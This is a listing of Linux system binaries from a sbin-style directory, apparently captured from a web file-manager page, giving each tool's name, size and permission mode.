upgrade-from-grub-legacy File 1.56 KB 0755
usb_modeswitch File 59.66 KB 0755
usb_modeswitch_dispatcher File 26.78 KB 0755
usbmuxd File 90.6 KB 0755
useradd File 139.88 KB 0755
userdel File 91.01 KB 0755
usermod File 127.65 KB 0755
ustat File 12.12 KB 0755
uthreads File 4 KB 0755
uuidd File 30.88 KB 0755
validlocale File 1.73 KB 0755
vcstime File 14.3 KB 0755
vdpa File 34.56 KB 0755
veritysetup File 43.94 KB 0755
vfscount-bpfcc File 1.36 KB 0755
vfscount.bt File 515 B 0755
vfsstat-bpfcc File 4.06 KB 0755
vfsstat.bt File 721 B 0755
vgcfgbackup File 3.01 MB 0755
vgcfgrestore File 3.01 MB 0755
vgchange File 3.01 MB 0755
vgck File 3.01 MB 0755
vgconvert File 3.01 MB 0755
vgcreate File 3.01 MB 0755
vgdisplay File 3.01 MB 0755
vgexport File 3.01 MB 0755
vgextend File 3.01 MB 0755
vgimport File 3.01 MB 0755
vgimportclone File 3.01 MB 0755
vgmerge File 3.01 MB 0755
vgmknodes File 3.01 MB 0755
vgreduce File 3.01 MB 0755
vgremove File 3.01 MB 0755
vgrename File 3.01 MB 0755
vgs File 3.01 MB 0755
vgscan File 3.01 MB 0755
vgsplit File 3.01 MB 0755
vigr File 60.69 KB 0755
vipw File 60.69 KB 0755
virtiostat-bpfcc File 8.69 KB 0755
visudo File 252.71 KB 0755
vpddecode File 14.58 KB 0755
wakeuptime-bpfcc File 8.1 KB 0755
wipefs File 38.38 KB 0755
writeback.bt File 1.66 KB 0755
xfs_admin File 2.12 KB 0755
xfs_bmap File 695 B 0755
xfs_copy File 90.44 KB 0755
xfs_db File 688.56 KB 0755
xfs_estimate File 14.16 KB 0755
xfs_freeze File 800 B 0755
xfs_fsr File 42.18 KB 0755
xfs_growfs File 38.23 KB 0755
xfs_info File 1.26 KB 0755
xfs_io File 203.65 KB 0755
xfs_logprint File 78.27 KB 0755
xfs_mdrestore File 34.23 KB 0755
xfs_metadump File 816 B 0755
xfs_mkfile File 1.02 KB 0755
xfs_ncheck File 685 B 0755
xfs_quota File 90.16 KB 0755
xfs_repair File 643.32 KB 0755
xfs_rtcp File 18.15 KB 0755
xfs_scrub File 106.27 KB 0755
xfs_scrub_all File 7.66 KB 0755
xfs_spaceman File 42.3 KB 0755
xfsdist-bpfcc File 4.61 KB 0755
xfsdist.bt File 972 B 0755
xfsslower-bpfcc File 7.78 KB 0755
xtables-legacy-multi File 92.95 KB 0755
xtables-monitor File 219.16 KB 0755
xtables-nft-multi File 219.16 KB 0755
zerofree File 14.15 KB 0755
zfsdist-bpfcc File 5.3 KB 0755
zfsslower-bpfcc File 8.45 KB 0755
zic File 66.39 KB 0755
zramctl File 54.52 KB 0755
Filemanager